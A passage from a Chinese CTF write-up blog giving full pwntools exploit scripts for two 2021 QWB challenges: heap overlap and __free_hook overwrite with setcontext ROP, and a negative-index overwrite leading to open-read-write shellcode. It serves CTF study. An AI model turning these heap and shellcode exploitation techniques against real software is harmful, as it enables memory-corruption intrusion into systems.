add(0x60, payload+'\n')    #2
add(0x20, '/bin/sh\x00'+'\n') #16
add(0x20, p64(system_addr)+'\n')

delete(16)

p.interactive()

Baby_pwn

程序分析

unsigned __int64 __fastcall sub_EB1(_BYTE *chunk)
{
  unsigned __int64 result; // rax

  while ( 1 )
  {
    result = (unsigned __int8)*chunk;
    if ( !(_BYTE)result )
      break;
    if ( *chunk == 0x11 )
    {
      result = (unsigned __int64)chunk;
      *chunk = 0;
      return result;
    }
    ++chunk;
  }
  return result;
}

会将输入的堆块数据中 \x11改写为 \x00。可以利用这个来实现堆重叠。

利用分析

2.27 的堆重叠，构造比较简单。

然后利用 setcontext+53的位置来实现 orw

EXP

from pwn import *
from z3 import *

context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
filename = './babypwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    libc = ELF(libcname)
    elf = ELF(filename)
else:
    p = process()

def add(size):
    p.sendlineafter('>>> ', str(1))
    p.sendlineafter('size:', str(size))

def delete(idx):
    p.sendlineafter('>>> ', str(2))
    p.sendlineafter('index:', str(idx))

def edit(idx, payload):
    p.sendlineafter('>>> ', str(3))
    p.sendlineafter('index:', str(idx))
    p.sendlineafter('content:', payload)

def show(idx):
    p.sendlineafter('>>> ', str(4))
    p.sendlineafter('index:', str(idx))

def solve(target):
    a1 = BitVec('a1', 32)
    x = a1
    for _ in range(2):
        x ^= (32 * x) ^ ((x ^ (32 * x)) >> 17) ^ (((32 * x) ^ x ^ ((x ^ (32 * x)) >> 17)) << 13)

    s = Solver()
    s.add(x==target)
    assert s.check() == sat
    return (s.model()[a1].as_long())

def pad(s, e):
    return (1 << e)-(1 << s)

def de_tail(a, m):
    s = 0
    re = a
    while s < 32:
        t = re & pad(s, min(s+m,32))
        re = re ^ ((t << m) & ((1 << 32)-1))
        s += m
    return re

def de_head(a, m):
    e = 32
    re = a
    while e > 0:
        t = re & pad(max(0, e-m), e)
        re = re ^ (t >> m)
        e -= m
    return re

def decrypt_one(a):
    re = a
    re = de_tail(re, 13)
    re = de_head(re, 17)
    re = de_tail(re, 5)
    re = de_tail(re, 13)
    re = de_head(re, 17)
    re = de_tail(re, 5)
    return re

def decrypt(par1, par2):
    log.success("decrypt part {} {}".format(hex(par1), hex(par2)))
    return decrypt_one(par1)  + (decrypt_one(par2) << 32)

def pwn():
    for i in range(11):
        add(0x108)
    add(0x20)
    # gdb.attach(p, 'bp $rebase(0x110f)')
    for i in range(7):
        delete(4+i)
    for i in range(7):
        add(0xf8)
    for i in range(7):
        delete(4+i)

#    gdb.attach(p, 'b $rebase(0x112c)')
    delete(0)
    payload = 'a'*0x108
    edit(1, payload)
    payload = b'a'*0x100 + p64(0x220)
    edit(1, payload)

    #gdb.attach(p, 'bp $rebase(0x112c)')
    payload = (p64(0x20)+p64(0x21))*0x10
    edit(2, payload)
    edit(3, payload)

    #delete(0)
    delete(2)
    print("chunk extend")
    add(0x150)  #0
    #add(0x150)  #2

    show(0)
    p.recvuntil('\n')
    data1 = p.recvuntil('\n', drop=True)
    print('data1:',data1)
    data2 = p.recvuntil('\n', drop=True)
    print('data2:',data2)
    libc_addr = decrypt(int(data1, 16), int(data2,16))
    print("libc_addr:",hex(libc_addr))
    libc_base = libc_addr - 0x3ebfb0
    free_hook = libc_base + libc.sym['__free_hook']
    system_addr = libc_base + libc.sym['system']
    print("libc_base:",hex(libc_base),hex(system_addr))
    setcontext = libc_base + libc.sym['setcontext']
    p_rdi_r = 0x2155f + libc_base
    p_rdx_r = 0x1b96 + libc_base
    p_rsi_r = 0x23e8a + libc_base
    open_addr = libc.sym['open'] + libc_base
    read_addr = libc.sym['read'] + libc_base
    write_addr = libc.sym['write'] + libc_base
    ret_addr = libc_base + 0x8aa
    syscall = 0xd29d5 + libc_base
    p_rax_r = 0x43a78 + libc_base

    print("clear tcache")
    add(0x100)  #2
    add(0x100)  #4

    delete(3)
    delete(1)
    delete(0)
    payload = 'a'*0x100+p64(0)+p64(0x201)+p64(free_hook)
    add(0x150)
    edit(0, payload)

    add(0x100)  #1
    edit(1, 'a'*0x100)
    delete(1)
    edit(0, payload)

    add(0x1f0)  #1

    print("free_hook")
    add(0x1f0)  #3

    flag_str_addr = free_hook+0x1d0
    flag_addr = free_hook+0x200
    orw = flat([
        p_rdi_r, flag_str_addr,
        p_rsi_r, 0,
        p_rax_r, 2,
        syscall,
        p_rdi_r, 3,
        p_rsi_r, flag_addr,
        p_rdx_r, 0x30,
        read_addr,
        p_rdi_r, 1,
        p_rsi_r, flag_addr,
        p_rdx_r, 0x30,
        write_addr
    ])

    payload = p64(setcontext+53)
    payload = payload.ljust(0x78, b'\x00') + p64(free_hook+0x120)
    payload = payload.ljust(0xa0, b'\x00')+ p64(free_hook+0x120) + p64(ret_addr)+p64(free_hook+0x120)
    payload = payload.ljust(0x100, b'\x00') + p64(ret_addr)#+orw
    payload = payload.ljust(0x120, b'\x00') + orw
    payload = payload.ljust(0x1d0, b'\x00') + './flag\x00'

    edit(3, payload)

    delete(3)
    p.interactive()

pwn()

orw

利用分析

add 和 delete都可以向上溢出。修改 atoi后，输入更多的 shellcode，最终执行 read读入更多的 shellcode 执行 orw

EXP

from pwn import *

context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])
filename = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename ,env = {'LD_PRELOAD':'./libseccomp.so.0'})
    libc = ELF(libcname)
    elf = ELF(filename)
else:
    p = process()

def add(idx, size, payload):
    p.sendlineafter('choice >>', str(1))
    p.sendlineafter('index:', str(idx))
    p.sendlineafter('size:', str(size))
    p.sendlineafter('content:', payload)

def delete(idx):
    p.sendlineafter('choice >>', str(2))
    p.sendlineafter('index:', str(idx))

def pwn():
    payload = asm('''
        jmp rdi
    ''')
    idx = -((0xe0-0x70)/8)
    gdb.attach(p)
    add(idx, 0x8, payload)

    payload = asm('''
        mov rsi, rbp
        mov rdi, 0
        mov dl, 0xf0
        mov rax, 0
        syscall
        jmp rbp
    ''')
    p.sendlineafter('choice >>', payload)

    payload = asm('''
        mov rdi, 0x61626364652f2e
        mov rsi, 0
        mov rax, 2
        syscall
        mov rdi, 3
        mov rsi, rbp
        mov rdx, 0x30
        mov rax, 0
        syscall
        mov rdi, 1
        mov rsi, rbp
        mov rdx, 0x30
        mov rax, 1
        syscall
    ''')
    shellcode = shellcraft.pushstr("/ flag")

    shellcode += shellcraft.open("rsp")

    shellcode += shellcraft.read('rax', 'rsp', 100)

    shellcode += shellcraft.write(1, 'rsp', 100)

    p.sendline(shellcode)

    p.interactive()

pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2021/06/25/2021-QWB题解/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！